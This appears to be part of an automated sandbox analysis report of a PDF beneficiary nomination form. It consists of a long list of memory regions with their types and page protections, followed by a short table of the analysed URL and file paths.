page read and write
|
||
14286813000
|
heap
|
page read and write
|
||
2740CC50000
|
heap
|
page read and write
|
||
C9B911F000
|
stack
|
page read and write
|
||
22844423000
|
heap
|
page read and write
|
||
22844423000
|
heap
|
page read and write
|
||
1428C04F000
|
heap
|
page read and write
|
||
2740CC9A000
|
heap
|
page read and write
|
||
14287D40000
|
trusted library allocation
|
page read and write
|
||
26418C57000
|
heap
|
page read and write
|
||
2740CCF8000
|
heap
|
page read and write
|
||
1998F433000
|
heap
|
page read and write
|
||
2284D19C000
|
heap
|
page read and write
|
||
12903FE000
|
unkown
|
page readonly
|
||
11E71BF6000
|
heap
|
page read and write
|
||
28C0000
|
heap
|
page read and write
|
||
12906FE000
|
unkown
|
page readonly
|
||
228446AA000
|
heap
|
page read and write
|
||
1428C000000
|
heap
|
page read and write
|
||
3475000
|
heap
|
page read and write
|
||
1998F437000
|
heap
|
page read and write
|
||
11E71BD7000
|
heap
|
page read and write
|
||
26418546000
|
heap
|
page read and write
|
||
7FFB27C76000
|
unkown
|
page readonly
|
||
1998EC90000
|
heap
|
page read and write
|
||
1998EF7A000
|
heap
|
page read and write
|
||
2284442B000
|
heap
|
page read and write
|
||
1998F43E000
|
heap
|
page read and write
|
||
28A0000
|
heap
|
page read and write
|
||
22844B30000
|
heap
|
page read and write
|
||
142879C0000
|
trusted library section
|
page readonly
|
||
1428BF70000
|
remote allocation
|
page read and write
|
||
11E71BD6000
|
heap
|
page read and write
|
||
123D6707000
|
heap
|
page read and write
|
||
14286890000
|
heap
|
page read and write
|
||
35B5000
|
heap
|
page read and write
|
||
2740CCF8000
|
heap
|
page read and write
|
||
26418555000
|
heap
|
page read and write
|
||
D2D0000
|
trusted library allocation
|
page read and write
|
||
7FFB167B2000
|
unkown
|
page readonly
|
||
2284466B000
|
heap
|
page read and write
|
||
AABC000
|
heap
|
page read and write
|
||
2740CCD9000
|
heap
|
page read and write
|
||
14286F90000
|
trusted library section
|
page read and write
|
||
1428BEA0000
|
trusted library allocation
|
page read and write
|
||
1428C0BC000
|
heap
|
page read and write
|
||
14287015000
|
heap
|
page read and write
|
||
1998EC60000
|
trusted library allocation
|
page read and write
|
||
123D672A000
|
heap
|
page read and write
|
||
142879B0000
|
trusted library section
|
page readonly
|
||
BE7927F000
|
stack
|
page read and write
|
||
123D68B5000
|
heap
|
page read and write
|
||
27A55788000
|
heap
|
page read and write
|
||
36B0000
|
heap
|
page read and write
|
||
2284CAF5000
|
heap
|
page read and write
|
||
7FFB27C60000
|
unkown
|
page readonly
|
||
11E71BD9000
|
heap
|
page read and write
|
||
2284CAF6000
|
heap
|
page read and write
|
||
D3D459A000
|
stack
|
page read and write
|
||
1428BE29000
|
trusted library allocation
|
page read and write
|
||
2284CB00000
|
heap
|
page read and write
|
||
BE792FB000
|
stack
|
page read and write
|
||
2641853B000
|
heap
|
page read and write
|
||
12904FE000
|
unkown
|
page readonly
|
||
14287102000
|
heap
|
page read and write
|
||
123D68BA000
|
heap
|
page read and write
|
||
2284CB00000
|
heap
|
page read and write
|
||
D3D49FF000
|
stack
|
page read and write
|
||
3590000
|
heap
|
page read and write
|
||
1998EEE0000
|
heap
|
page read and write
|
||
1998F430000
|
heap
|
page read and write
|
||
79874FE000
|
stack
|
page read and write
|
||
2740CF05000
|
heap
|
page read and write
|
||
2740CCA9000
|
heap
|
page read and write
|
||
123D6731000
|
heap
|
page read and write
|
||
79AB3FE000
|
stack
|
page read and write
|
||
2021B9F0000
|
heap
|
page read and write
|
||
2021BB34000
|
heap
|
page read and write
|
||
1998EC10000
|
heap
|
page read and write
|
||
65B000
|
stack
|
page read and write
|
||
2284CAD3000
|
heap
|
page read and write
|
||
2284CB20000
|
heap
|
page read and write
|
||
142868AF000
|
heap
|
page read and write
|
||
BE791FE000
|
stack
|
page read and write
|
||
201017E000
|
stack
|
page read and write
|
||
27A556D0000
|
heap
|
page read and write
|
||
11E71BCA000
|
heap
|
page read and write
|
||
123D68B7000
|
heap
|
page read and write
|
||
3450000
|
heap
|
page read and write
|
||
B4BC000
|
heap
|
page read and write
|
||
1428BE10000
|
trusted library allocation
|
page read and write
|
||
351E000
|
stack
|
page read and write
|
||
1998EC60000
|
trusted library allocation
|
page read and write
|
||
BD7000
|
heap
|
page read and write
|
||
2284CB28000
|
heap
|
page read and write
|
||
B37A000
|
heap
|
page read and write
|
||
915000
|
heap
|
page read and write
|
||
264184A0000
|
heap
|
page read and write
|
||
BD8D000
|
heap
|
page read and write
|
||
228445A0000
|
heap
|
page read and write
|
||
2284442B000
|
heap
|
page read and write
|
||
2284466A000
|
heap
|
page read and write
|
||
30FD000
|
stack
|
page read and write
|
||
11E71BA3000
|
heap
|
page read and write
|
||
11E71B7C000
|
heap
|
page read and write
|
||
1428C10A000
|
heap
|
page read and write
|
||
2284CAC9000
|
heap
|
page read and write
|
||
22844B3C000
|
heap
|
page read and write
|
||
8CE05FF000
|
stack
|
page read and write
|
||
2021DA70000
|
heap
|
page read and write
|
||
123D87F0000
|
heap
|
page read and write
|
||
2740CB50000
|
heap
|
page read and write
|
||
14286800000
|
heap
|
page read and write
|
||
7FFB226D0000
|
unkown
|
page read and write
|
||
CA6000
|
unkown
|
page write copy
|
||
11E71BD5000
|
heap
|
page read and write
|
||
1998ED3C000
|
heap
|
page read and write
|
||
14286902000
|
heap
|
page read and write
|
||
123D6744000
|
heap
|
page read and write
|
||
123D68B4000
|
heap
|
page read and write
|
||
1428BF70000
|
remote allocation
|
page read and write
|
||
228445C0000
|
trusted library allocation
|
page read and write
|
||
378F000
|
unkown
|
page read and write
|
||
C78D000
|
heap
|
page read and write
|
||
123D68BE000
|
heap
|
page read and write
|
||
2284466E000
|
heap
|
page read and write
|
||
33BF000
|
unkown
|
page read and write
|
||
22844409000
|
heap
|
page read and write
|
||
1428C090000
|
heap
|
page read and write
|
||
123D6690000
|
trusted library allocation
|
page read and write
|
||
7FFB226B0000
|
unkown
|
page readonly
|
||
7FFB167B5000
|
unkown
|
page readonly
|
||
7FFB27C85000
|
unkown
|
page readonly
|
||
27A55780000
|
heap
|
page read and write
|
||
200FC8A000
|
stack
|
page read and write
|
||
7AC837F000
|
stack
|
page read and write
|
||
2021BB11000
|
heap
|
page read and write
|
||
2740CDA0000
|
trusted library allocation
|
page read and write
|
||
22844407000
|
heap
|
page read and write
|
||
1998ED31000
|
heap
|
page read and write
|
||
2740EB20000
|
heap
|
page read and write
|
||
11E71BDF000
|
heap
|
page read and write
|
||
11E71BCE000
|
heap
|
page read and write
|
||
22844430000
|
heap
|
page read and write
|
||
22844426000
|
heap
|
page read and write
|
||
12905FE000
|
unkown
|
page readonly
|
||
1428BDF0000
|
trusted library allocation
|
page read and write
|
||
11E71AC0000
|
heap
|
page read and write
|
||
123D6747000
|
heap
|
page read and write
|
||
22846560000
|
heap
|
page read and write
|
||
7FFB226D0000
|
unkown
|
page read and write
|
||
246926B0000
|
heap
|
page read and write
|
||
129047E000
|
stack
|
page read and write
|
||
123D68B2000
|
heap
|
page read and write
|
||
123D6690000
|
trusted library allocation
|
page read and write
|
||
22844660000
|
heap
|
page read and write
|
||
2641855A000
|
heap
|
page read and write
|
||
7987BFE000
|
stack
|
page read and write
|
||
2740D284000
|
heap
|
page read and write
|
||
26418C60000
|
heap
|
page read and write
|
||
7FFB167A6000
|
unkown
|
page readonly
|
||
ACAA000
|
heap
|
page read and write
|
||
2284CC4A000
|
heap
|
page read and write
|
||
11E71AD0000
|
heap
|
page read and write
|
||
22844B44000
|
heap
|
page read and write
|
||
2641853A000
|
heap
|
page read and write
|
||
123D6E02000
|
heap
|
page read and write
|
||
7E0000
|
heap
|
page read and write
|
||
228446A5000
|
heap
|
page read and write
|
||
1998EF70000
|
heap
|
page read and write
|
||
264186D0000
|
trusted library allocation
|
page read and write
|
||
2740CC93000
|
heap
|
page read and write
|
||
7AC7FCB000
|
stack
|
page read and write
|
||
34CE000
|
unkown
|
page read and write
|
||
11E71BE1000
|
heap
|
page read and write
|
||
123D6731000
|
heap
|
page read and write
|
||
1998ED31000
|
heap
|
page read and write
|
||
2D9D000
|
stack
|
page read and write
|
||
7FFB27C82000
|
unkown
|
page readonly
|
||
2284466A000
|
heap
|
page read and write
|
||
BEC9000
|
heap
|
page read and write
|
||
B4BC000
|
heap
|
page read and write
|
||
7FFB27C76000
|
unkown
|
page readonly
|
||
123D6960000
|
heap
|
page read and write
|
||
26418C5A000
|
heap
|
page read and write
|
||
128FE7E000
|
stack
|
page read and write
|
||
27A57660000
|
heap
|
page read and write
|
||
22844423000
|
heap
|
page read and write
|
||
1428711A000
|
heap
|
page read and write
|
||
26418C5E000
|
heap
|
page read and write
|
||
11E71BCA000
|
heap
|
page read and write
|
||
2284CA80000
|
trusted library allocation
|
page read and write
|
||
11E71BD7000
|
heap
|
page read and write
|
||
200FD0E000
|
stack
|
page read and write
|
||
22844663000
|
heap
|
page read and write
|
||
128FFFE000
|
unkown
|
page readonly
|
||
32B0000
|
heap
|
page read and write
|
||
7FFB27C82000
|
unkown
|
page readonly
|
||
7AC827E000
|
stack
|
page read and write
|
||
2740CF0A000
|
heap
|
page read and write
|
||
11E71B10000
|
heap
|
page read and write
|
||
228443E7000
|
heap
|
page read and write
|
||
BE78D8E000
|
stack
|
page read and write
|
||
11E71BD5000
|
heap
|
page read and write
|
||
323D000
|
stack
|
page read and write
|
||
B6A0000
|
heap
|
page read and write
|
||
79875FE000
|
stack
|
page read and write
|
||
1428687D000
|
heap
|
page read and write
|
||
22844B42000
|
heap
|
page read and write
|
||
11E71BCE000
|
heap
|
page read and write
|
||
1998ECF4000
|
heap
|
page read and write
|
||
33A0000
|
heap
|
page read and write
|
||
14286929000
|
heap
|
page read and write
|
||
A770000
|
trusted library allocation
|
page read and write
|
||
26418537000
|
heap
|
page read and write
|
||
79877FF000
|
stack
|
page read and write
|
||
14287000000
|
heap
|
page read and write
|
||
11E71BD7000
|
heap
|
page read and write
|
||
1998ED19000
|
heap
|
page read and write
|
||
2740CC9B000
|
heap
|
page read and write
|
||
14287970000
|
trusted library section
|
page readonly
|
||
321E000
|
unkown
|
page read and write
|
||
AABC000
|
heap
|
page read and write
|
||
228443A0000
|
heap
|
page read and write
|
||
2740D270000
|
heap
|
page read and write
|
||
2284CAD2000
|
heap
|
page read and write
|
||
914000
|
heap
|
page read and write
|
||
11E71BCE000
|
heap
|
page read and write
|
||
123D68B3000
|
heap
|
page read and write
|
||
1428BEB0000
|
trusted library allocation
|
page read and write
|
||
1428BF30000
|
trusted library allocation
|
page read and write
|
||
2641853A000
|
heap
|
page read and write
|
||
28AC000
|
heap
|
page read and write
|
||
1998F43A000
|
heap
|
page read and write
|
||
1428C0C4000
|
heap
|
page read and write
|
||
26418C67000
|
heap
|
page read and write
|
||
2284CD0A000
|
heap
|
page read and write
|
||
C57814F000
|
stack
|
page read and write
|
||
333D000
|
stack
|
page read and write
|
||
1428BF20000
|
trusted library allocation
|
page read and write
|
||
123D6752000
|
heap
|
page read and write
|
||
2740CD01000
|
heap
|
page read and write
|
||
12909FC000
|
stack
|
page read and write
|
||
1998F454000
|
heap
|
page read and write
|
||
1428BF10000
|
trusted library allocation
|
page read and write
|
||
C9B919F000
|
stack
|
page read and write
|
||
2284CAD7000
|
heap
|
page read and write
|
||
14287100000
|
heap
|
page read and write
|
||
11E71BCA000
|
heap
|
page read and write
|
||
B4B8000
|
heap
|
page read and write
|
||
22844415000
|
heap
|
page read and write
|
||
14287890000
|
trusted library allocation
|
page read and write
|
||
2740CCF1000
|
heap
|
page read and write
|
||
7FFB226C6000
|
unkown
|
page readonly
|
||
129067E000
|
stack
|
page read and write
|
||
26418C50000
|
heap
|
page read and write
|
||
C7B000
|
unkown
|
page readonly
|
||
2740CCE1000
|
heap
|
page read and write
|
||
123D6703000
|
heap
|
page read and write
|
||
A97E000
|
heap
|
page read and write
|
||
1290AFE000
|
unkown
|
page readonly
|
||
123D68BA000
|
heap
|
page read and write
|
||
1428BDD0000
|
trusted library allocation
|
page read and write
|
||
D3D497F000
|
stack
|
page read and write
|
||
ACA5000
|
heap
|
page read and write
|
||
228443D8000
|
heap
|
page read and write
|
||
12900FE000
|
unkown
|
page readonly
|
||
BF1000
|
unkown
|
page execute read
|
||
123D68BE000
|
heap
|
page read and write
|
||
425DFF000
|
stack
|
page read and write
|
||
2021BB31000
|
heap
|
page read and write
|
||
364F000
|
stack
|
page read and write
|
||
2800000
|
heap
|
page read and write
|
||
264184B0000
|
heap
|
page read and write
|
||
142879A0000
|
trusted library section
|
page readonly
|
||
2021BB09000
|
heap
|
page read and write
|
||
22844423000
|
heap
|
page read and write
|
||
34D0000
|
heap
|
page read and write
|
||
24692740000
|
heap
|
page read and write
|
||
2641A6D0000
|
heap
|
page read and write
|
||
2284CB00000
|
heap
|
page read and write
|
||
BEC0000
|
trusted library allocation
|
page read and write
|
||
26418C55000
|
heap
|
page read and write
|
||
11E71BCE000
|
heap
|
page read and write
|
||
7FFB226B0000
|
unkown
|
page readonly
|
||
123D6690000
|
trusted library allocation
|
page read and write
|
||
1998F432000
|
heap
|
page read and write
|
||
11E71BD5000
|
heap
|
page read and write
|
||
27A557F5000
|
heap
|
page read and write
|
||
1428C0FF000
|
heap
|
page read and write
|
||
2284CC43000
|
heap
|
page read and write
|
||
129007E000
|
stack
|
page read and write
|
||
3100000
|
heap
|
page read and write
|
||
7FFB16791000
|
unkown
|
page execute read
|
||
123D6670000
|
heap
|
page read and write
|
||
1428BD40000
|
trusted library allocation
|
page read and write
|
||
2284CC44000
|
heap
|
page read and write
|
||
246926A0000
|
heap
|
page read and write
|
||
11E71BDF000
|
heap
|
page read and write
|
||
264184D0000
|
heap
|
page read and write
|
||
2740CCF3000
|
heap
|
page read and write
|
||
2021BC00000
|
heap
|
page read and write
|
||
11E71B64000
|
heap
|
page read and write
|
||
2740CCF6000
|
heap
|
page read and write
|
||
26418C52000
|
heap
|
page read and write
|
||
123D6731000
|
heap
|
page read and write
|
||
326E000
|
stack
|
page read and write
|
||
2740D27C000
|
heap
|
page read and write
|
||
11E71B7B000
|
heap
|
page read and write
|
||
26418536000
|
heap
|
page read and write
|
||
2284CD05000
|
heap
|
page read and write
|
||
11E71BCA000
|
heap
|
page read and write
|
||
11E71B7F000
|
heap
|
page read and write
|
||
22844408000
|
heap
|
page read and write
|
||
11E71BD7000
|
heap
|
page read and write
|
||
1998EF75000
|
heap
|
page read and write
|
||
2740CCF1000
|
heap
|
page read and write
|
||
2284466E000
|
heap
|
page read and write
|
||
22844B42000
|
heap
|
page read and write
|
||
2021BBAD000
|
heap
|
page read and write
|
||
7FFB226D5000
|
unkown
|
page readonly
|
||
11E71BD6000
|
heap
|
page read and write
|
||
2021D720000
|
heap
|
page read and write
|
||
1998F43A000
|
heap
|
page read and write
|
||
CA6000
|
unkown
|
page write copy
|
||
2740CCA0000
|
heap
|
page read and write
|
||
201007F000
|
stack
|
page read and write
|
||
228446A0000
|
heap
|
page read and write
|
||
1428C08D000
|
heap
|
page read and write
|
||
7FFB226D5000
|
unkown
|
page readonly
|
||
14286873000
|
heap
|
page read and write
|
||
2284CBC0000
|
heap
|
page read and write
|
||
2740CC30000
|
heap
|
page read and write
|
||
2021BB4A000
|
heap
|
page read and write
|
||
700000
|
heap
|
page read and write
|
||
2890000
|
heap
|
page read and write
|
||
2641853A000
|
heap
|
page read and write
|
||
11E71BCE000
|
heap
|
page read and write
|
||
14286F80000
|
trusted library allocation
|
page read and write
|
||
7AC847F000
|
stack
|
page read and write
|
||
AAB5000
|
heap
|
page read and write
|
||
7FFB27C80000
|
unkown
|
page read and write
|
||
27A557F4000
|
heap
|
page read and write
|
||
123D6DF0000
|
heap
|
page read and write
|
||
123D696A000
|
heap
|
page read and write
|
||
22844414000
|
heap
|
page read and write
|
||
1428711B000
|
heap
|
page read and write
|
||
26418567000
|
heap
|
page read and write
|
||
2740CC70000
|
trusted library allocation
|
page read and write
|
||
914000
|
heap
|
page read and write
|
||
2284D197000
|
heap
|
page read and write
|
||
7987DFB000
|
stack
|
page read and write
|
||
2021BB6E000
|
heap
|
page read and write
|
||
123D66C0000
|
heap
|
page read and write
|
||
2284CC20000
|
heap
|
page read and write
|
||
1428C02C000
|
heap
|
page read and write
|
||
2284CA80000
|
trusted library allocation
|
page read and write
|
||
79AB4FF000
|
stack
|
page read and write
|
||
B370000
|
heap
|
page read and write
|
||
1428711A000
|
heap
|
page read and write
|
||
A971000
|
heap
|
page read and write
|
||
14287002000
|
heap
|
page read and write
|
||
22844662000
|
heap
|
page read and write
|
||
26418561000
|
heap
|
page read and write
|
||
1998ECE0000
|
heap
|
page read and write
|
||
1998F448000
|
heap
|
page read and write
|
||
14287D11000
|
trusted library allocation
|
page read and write
|
||
22844667000
|
heap
|
page read and write
|
||
228443E7000
|
heap
|
page read and write
|
||
24692748000
|
heap
|
page read and write
|
||
2740D282000
|
heap
|
page read and write
|
||
2021BB4A000
|
heap
|
page read and write
|
||
1428685B000
|
heap
|
page read and write
|
||
1998F43B000
|
heap
|
page read and write
|
||
1998F452000
|
heap
|
page read and write
|
||
35B0000
|
heap
|
page read and write
|
||
123D6DFC000
|
heap
|
page read and write
|
||
12902FA000
|
stack
|
page read and write
|
||
B6A5000
|
heap
|
page read and write
|
||
123D68BB000
|
heap
|
page read and write
|
||
11E71BE1000
|
heap
|
page read and write
|
||
2740CCE1000
|
heap
|
page read and write
|
||
710000
|
heap
|
page read and write
|
||
22844390000
|
heap
|
page read and write
|
||
2284CAFA000
|
heap
|
page read and write
|
||
7FFB226D2000
|
unkown
|
page readonly
|
||
1998F440000
|
heap
|
page read and write
|
||
C5780CB000
|
stack
|
page read and write
|
||
11E71BD5000
|
heap
|
page read and write
|
||
1428BDB0000
|
trusted library allocation
|
page read and write
|
||
26418C5A000
|
heap
|
page read and write
|
||
123D6702000
|
heap
|
page read and write
|
||
2284D198000
|
heap
|
page read and write
|
||
1998EC20000
|
heap
|
page read and write
|
||
2641874A000
|
heap
|
page read and write
|
||
12901FE000
|
unkown
|
page readonly
|
||
2021BDA0000
|
heap
|
page read and write
|
||
BE790FD000
|
stack
|
page read and write
|
||
26418C74000
|
heap
|
page read and write
|
||
26418555000
|
heap
|
page read and write
|
||
11E71B7F000
|
heap
|
page read and write
|
||
142868A4000
|
heap
|
page read and write
|
||
123D68B7000
|
heap
|
page read and write
|
||
388F000
|
stack
|
page read and write
|
||
1428BE00000
|
trusted library allocation
|
page read and write
|
||
128FBFE000
|
unkown
|
page readonly
|
||
7FFB226D5000
|
unkown
|
page readonly
|
||
A530000
|
trusted library allocation
|
page read and write
|
||
C7B000
|
unkown
|
page readonly
|
||
264184F0000
|
trusted library allocation
|
page read and write
|
||
26418557000
|
heap
|
page read and write
|
||
7FFB226C6000
|
unkown
|
page readonly
|
||
D3D4A7F000
|
stack
|
page read and write
|
||
7AC83FE000
|
stack
|
page read and write
|
||
26418C72000
|
heap
|
page read and write
|
||
1998ED1C000
|
heap
|
page read and write
|
||
228443E2000
|
heap
|
page read and write
|
||
11E71B9B000
|
heap
|
page read and write
|
||
11E71B7E000
|
heap
|
page read and write
|
||
14287990000
|
trusted library section
|
page readonly
|
||
A979000
|
heap
|
page read and write
|
||
7FFB27C60000
|
unkown
|
page readonly
|
||
2284CC42000
|
heap
|
page read and write
|
||
14286913000
|
heap
|
page read and write
|
||
128FF7E000
|
stack
|
page read and write
|
||
1428C0F7000
|
heap
|
page read and write
|
||
26418C68000
|
heap
|
page read and write
|
||
1998F43A000
|
heap
|
page read and write
|
||
2641855F000
|
heap
|
page read and write
|
||
D3D487E000
|
stack
|
page read and write
|
||
2284442B000
|
heap
|
page read and write
|
||
767000
|
heap
|
page read and write
|
||
A973000
|
heap
|
page read and write
|
||
1428D000000
|
heap
|
page read and write
|
||
11E71B40000
|
heap
|
page read and write
|
||
11E71BCE000
|
heap
|
page read and write
|
||
24692980000
|
heap
|
page read and write
|
||
1998ED19000
|
heap
|
page read and write
|
||
123D6742000
|
heap
|
page read and write
|
||
79AB37F000
|
stack
|
page read and write
|
||
27A556C0000
|
heap
|
page read and write
|
||
26418519000
|
heap
|
page read and write
|
||
2740CC97000
|
heap
|
page read and write
|
||
2284CC47000
|
heap
|
page read and write
|
||
7FFB226D2000
|
unkown
|
page readonly
|
||
7FFB27C85000
|
unkown
|
page readonly
|
There are 780 hidden memdumps, click here to show them.
DOM / HTML
URL
|
Malicious
|
|
---|---|---|
https://www.oldmutual.co.za/v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b4434c/Superfund_Beneficiary_Nomination_form.pdf
|
||
file:///C:/Users/user/Downloads/downloaded.pdf
|
||
file:///C:/Users/user/Downloads/downloaded.pdf
|